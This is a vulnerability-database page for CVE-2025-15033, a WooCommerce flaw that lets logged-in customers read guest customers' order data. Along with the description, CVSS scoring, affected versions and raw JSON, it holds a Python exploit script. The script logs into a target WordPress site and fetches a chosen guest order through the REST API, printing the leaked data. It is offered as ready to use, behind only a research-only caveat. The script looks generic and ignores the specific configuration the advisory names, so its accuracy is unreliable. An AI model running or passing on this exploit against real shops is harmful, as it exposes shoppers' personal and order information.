Security Vulnerability Report
CVE-2025-15033 CVSS 6.5 MEDIUM

CVE-2025-15033

Published: 2025-12-22 19:15:49
Last Modified: 2026-04-15 00:35:42

Description

A vulnerability in WooCommerce 8.1 to 10.4.2 can allow logged-in customers to access order data of guest customers on sites with a certain configuration. This has been fixed in WooCommerce 10.4.3, as well as all the previously affected versions through point releases, starting from 8.1, where it has been fixed in 8.1.3. It does not affect WooCommerce 8.0 or earlier.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)


WooCommerce 8.1 - 8.1.2
WooCommerce 8.2 - 8.x
WooCommerce 9.x
WooCommerce 10.0 - 10.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-15033 WooCommerce Guest Order Information Disclosure PoC
# Requires authenticated user with low privileges
import requests
import sys

TARGET_URL = "https://vulnerable-site.com"
USERNAME = "[email protected]"
PASSWORD = "password123"
TARGET_ORDER_ID = 12345  # Guest order ID to target


def exploit_cve_2025_15033():
    """
    Exploit for WooCommerce CVE-2025-15033
    Information disclosure via unauthorized guest order access
    """
    session = requests.Session()

    # Step 1: Authenticate with low-privilege account
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        "log": USERNAME,
        "pwd": PASSWORD,
        "wp-submit": "Log In",
    }
    response = session.post(login_url, data=login_data)
    if "wordpress_logged_in" not in session.cookies:
        print("[-] Authentication failed")
        return None
    print("[+] Successfully authenticated")

    # Step 2: Attempt to access guest order data
    # WooCommerce REST API endpoint for orders
    order_url = f"{TARGET_URL}/wp-json/wc/v3/orders/{TARGET_ORDER_ID}"
    headers = {"Content-Type": "application/json"}
    response = session.get(order_url, headers=headers)
    if response.status_code == 200:
        order_data = response.json()
        print(f"[+] Successfully accessed guest order {TARGET_ORDER_ID}")
        print(f"[+] Order data leaked: {order_data}")
        return order_data
    else:
        print(f"[-] Failed to access order: {response.status_code}")
        return None


if __name__ == "__main__":
    exploit_cve_2025_15033()
```

References

https://wpscan.com/vulnerability/f55fd7d3-7fbe-474f-9406-f47f8aee5e57/
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-15033",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-22T19:15:48.510",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A vulnerability in WooCommerce 8.1 to 10.4.2 can allow logged-in customers to access order data of guest customers on sites with a certain configuration. This has been fixed in WooCommerce 10.4.3, as well as all the previously affected versions through point releases, starting from 8.1, where it has been fixed in 8.1.3. It does not affect WooCommerce 8.0 or earlier."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-200"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/f55fd7d3-7fbe-474f-9406-f47f8aee5e57/",
        "source": "[email protected]"
      }
    ]
  }
}
```